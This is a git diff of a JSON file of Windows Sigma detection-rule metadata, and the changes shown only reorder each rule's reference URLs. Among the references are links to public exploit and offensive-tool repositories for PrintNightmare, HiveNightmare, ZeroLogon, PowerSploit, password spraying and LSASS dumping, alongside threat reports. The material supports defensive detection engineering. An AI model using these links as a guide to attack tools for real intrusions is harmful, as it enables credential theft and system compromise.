"https://github.com/cube0x0/CVE-2021-1675", "https://github.com/hhlxf/PrintNightmare", + "https://github.com/afwu/PrintNightmare", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_1675_printspooler.yml" ], "tags": [ 
@@ -31638,9 +31662,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs", - "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs", "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", + "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs", + "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_inveigh_artefacts.yml" ], "tags": [ @@ -31765,11 +31789,11 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", - "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", - "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", + "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml" ], "tags": [ 
@@ -31851,21 +31875,21 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ + "https://github.com/HarmJ0y/DAMP", "https://github.com/samratashok/nishang", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", "https://github.com/PowerShellMafia/PowerSploit", "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", - "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", - "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", - "https://github.com/nettitude/Invoke-PowerThIEf", - "https://github.com/AlsidOfficial/WSUSpendu/", - "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - "https://github.com/NetSPI/PowerUpSQL", - "https://github.com/CsEnox/EventViewer-UACBypass", - "https://github.com/S3cur3Th1sSh1t/WinPwn", - "https://github.com/HarmJ0y/DAMP", - "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/nettitude/Invoke-PowerThIEf", + "https://github.com/S3cur3Th1sSh1t/WinPwn", + "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://github.com/AlsidOfficial/WSUSpendu/", + "https://github.com/CsEnox/EventViewer-UACBypass", + "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", + 
"https://github.com/NetSPI/PowerUpSQL", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml" ], "tags": [ @@ -31898,9 +31922,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ + "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", - "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml" ], "tags": [ @@ -32093,8 +32117,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", "https://persistence-info.github.io/Data/powershellprofile.html", + "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_powershell_profile.yml" ], "tags": [ 
@@ -32453,9 +32477,9 @@ "logsource.product": "windows", "refs": [ "https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml", - "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008", - "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", + "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", + "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml" ], "tags": [ @@ -32488,9 +32512,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", - "https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw", "https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g", + "https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw", + "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml" ], "tags": [ 
@@ -32514,9 +32538,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ + "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", - "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml" ], "tags": [ @@ -32538,8 +32562,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", + "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_adwind.yml" ], "tags": [ 
@@ -32613,8 +32637,8 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf",
 "https://github.com/deepinstinct/Lsass-Shtinkering",
+ "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_shtinkering.yml"
 ],
 "tags": [
@@ -32747,8 +32771,8 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md",
+ "https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_macro_file.yml"
 ],
 "tags": [
@@ -32831,8 +32855,8 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml",
 "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/",
+ "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_script_creation_by_office_using_file_ext.yml"
 ],
 "tags": [
@@ -32958,8 +32982,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration",
- "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1",
 "https://pentestlab.blog/tag/ntds-dit/",
+ "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1",
 "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit.yml"
 ],
@@ -32993,9 +33017,9 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1",
 "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb",
 "https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405",
+ "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml"
 ],
 "tags": [
@@ -33062,8 +33086,8 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/RonnyTNL/status/1436334640617373699?s=20",
 "https://twitter.com/vanitasnk/status/1437329511142420483?s=21",
+ "https://twitter.com/RonnyTNL/status/1436334640617373699?s=20",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_winword_cve_2021_40444.yml"
 ],
 "tags": [
@@ -33153,8 +33177,8 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/SBousseaden/status/1278977301745741825",
 "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/",
+ "https://twitter.com/SBousseaden/status/1278977301745741825",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml"
 ],
 "tags": [
@@ -33221,11 +33245,11 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/cube0x0/CVE-2021-36934",
- "https://www.google.com/search?q=%22reg.exe+save%22+sam",
- "https://github.com/search?q=CVE-2021-36934",
- "https://github.com/HuskyHacks/ShadowSteal",
 "https://github.com/FireFart/hivenightmare",
+ "https://github.com/search?q=CVE-2021-36934",
+ "https://www.google.com/search?q=%22reg.exe+save%22+sam",
+ "https://github.com/cube0x0/CVE-2021-36934",
+ "https://github.com/HuskyHacks/ShadowSteal",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sam_dump.yml"
 ],
 "tags": [
@@ -33375,10 +33399,10 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/WiredPulse/Invoke-HiveNightmare",
- "https://github.com/FireFart/hivenightmare/",
- "https://github.com/GossiTheDog/HiveNightmare",
 "https://twitter.com/cube0x0/status/1418920190759378944",
+ "https://github.com/FireFart/hivenightmare/",
+ "https://github.com/WiredPulse/Invoke-HiveNightmare",
+ "https://github.com/GossiTheDog/HiveNightmare",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hivenightmare_file_exports.yml"
 ],
 "tags": [
@@ -33470,9 +33494,9 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
+ "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/",
 "https://redcanary.com/blog/intelligence-insights-october-2021/",
 "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/",
- "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_vhd_download.yml"
 ],
 "tags": [
@@ -33572,8 +33596,8 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0",
 "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc",
+ "https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml"
 ],
 "tags": [
@@ -33755,9 +33779,9 @@
 "logsource.product": "windows",
 "refs": [
 "https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/",
+ "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/",
 "https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/",
 "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore",
- "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_recent.yml"
 ],
 "tags": "No established tags"
@@ -33812,8 +33836,8 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd",
 "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/",
+ "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_msdt_autorun.yml"
 ],
 "tags": [
@@ -33897,9 +33921,9 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
+ "https://github.com/fox-it/LDAPFragger",
 "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961",
 "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/",
- "https://github.com/fox-it/LDAPFragger",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_adsi_cache_usage.yml"
 ],
 "tags": [
@@ -33932,8 +33956,8 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html",
 "https://twitter.com/Sam0x90/status/1552011547974696960",
+ "https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_mount.yml"
 ],
 "tags": [
@@ -34273,11 +34297,11 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/",
- "https://github.com/Wh04m1001/SysmonEoP",
- "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/",
 "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992",
+ "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/",
+ "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/",
 "https://decoded.avast.io/martinchlumecky/png-steganography/",
+ "https://github.com/Wh04m1001/SysmonEoP",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml"
 ],
 "tags": [
@@ -34373,8 +34397,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://answers.microsoft.com/en-us/msoffice/forum/all/document-in-word-startup-folder-doesnt-open-when/44ab0932-2917-4150-8cdc-2f2cf39e86f3",
- "http://addbalance.com/word/startup.htm",
 "Malware Sandbox https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/",
+ "http://addbalance.com/word/startup.htm",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_winword_startup.yml"
 ],
 "tags": [
@@ -34465,8 +34489,8 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/cyb3rops/status/1552932770464292864",
 "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
+ "https://twitter.com/cyb3rops/status/1552932770464292864",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dll_sideloading_space_path.yml"
 ],
 "tags": [
@@ -34517,8 +34541,8 @@
 "logsource.category": "file_rename",
 "logsource.product": "windows",
 "refs": [
- "https://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/",
 "https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/",
+ "https://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_rename/file_rename_win_ransomware.yml"
 ],
 "tags": [
@@ -34886,8 +34910,8 @@
 "logsource.category": "file_access",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/lclevy/firepwd",
 "https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users",
+ "https://github.com/lclevy/firepwd",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_browser_credential_stealing.yml"
 ],
 "tags": [
@@ -35011,8 +35035,8 @@
 "logsource.category": "dns_query",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/notwhickey/status/1333900137232523264",
 "https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/",
+ "https://twitter.com/notwhickey/status/1333900137232523264",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_lolbin_appinstaller.yml"
 ],
 "tags": [
@@ -35111,10 +35135,10 @@
 "logsource.category": "dns_query",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows",
+ "https://redcanary.com/blog/misbehaving-rats/",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution",
- "https://redcanary.com/blog/misbehaving-rats/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_remote_access_software_domains.yml"
 ],
 "tags": [
@@ -35455,8 +35479,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/",
 "https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1562.001/T1562.001.md",
+ "https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_tamper_defender.yml"
 ],
 "tags": [
@@ -35613,8 +35637,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
 "https://nsudo.m2team.org/en-us/",
+ "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_as_priv_user.yml"
 ],
 "tags": [
@@ -35747,8 +35771,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md",
 "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_athremotefxvgpudisablementcommand.yml"
 ],
 "tags": [
@@ -35845,10 +35869,10 @@
 "refs": [
 "https://twitter.com/eral4m/status/1479106975967240209",
 "https://twitter.com/nas_bench/status/1433344116071583746",
- "https://twitter.com/Hexacorn/status/885258886428725250",
- "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52",
 "http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/",
 "https://twitter.com/eral4m/status/1479080793003671557",
+ "https://twitter.com/Hexacorn/status/885258886428725250",
+ "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_activity.yml"
 ],
 "tags": [
@@ -35981,9 +36005,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/",
- "https://securelist.com/my-name-is-dtrack/93338/",
 "https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/",
+ "https://securelist.com/my-name-is-dtrack/93338/",
+ "https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_dtrack.yml"
 ],
 "tags": [
@@ -36074,8 +36098,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.mandiant.com/resources/telegram-malware-iranian-espionage",
 "https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode",
+ "https://www.mandiant.com/resources/telegram-malware-iranian-espionage",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_screenconnect_anomaly.yml"
 ],
 "tags": [
@@ -36157,8 +36181,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/",
 "https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/",
+ "https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_loadassembly.yml"
 ],
 "tags": [
@@ -36303,9 +36327,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/",
 "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN",
 "https://twitter.com/frack113/status/1555830623633375232",
- "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml"
 ],
 "tags": [
@@ -36482,9 +36506,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/",
- "https://twitter.com/countuponsec/status/910977826853068800",
 "https://twitter.com/countuponsec/status/910969424215232518",
+ "https://twitter.com/countuponsec/status/910977826853068800",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml"
 ],
 "tags": [
@@ -36575,8 +36599,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf",
- "https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/",
 "https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2",
+ "https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_wrong_parent.yml"
 ],
 "tags": [
@@ -36657,8 +36681,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md",
 "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml"
 ],
 "tags": [
@@ -36691,9 +36715,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191",
 "Reegun J (OCBC Bank)",
 "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/",
+ "https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msoffice.yml"
 ],
 "tags": [
@@ -36759,9 +36783,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e",
 "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
 "https://github.com/netero1010/TrustedPath-UACBypass-BOF",
- "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml"
 ],
 "tags": [
@@ -36794,8 +36818,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/",
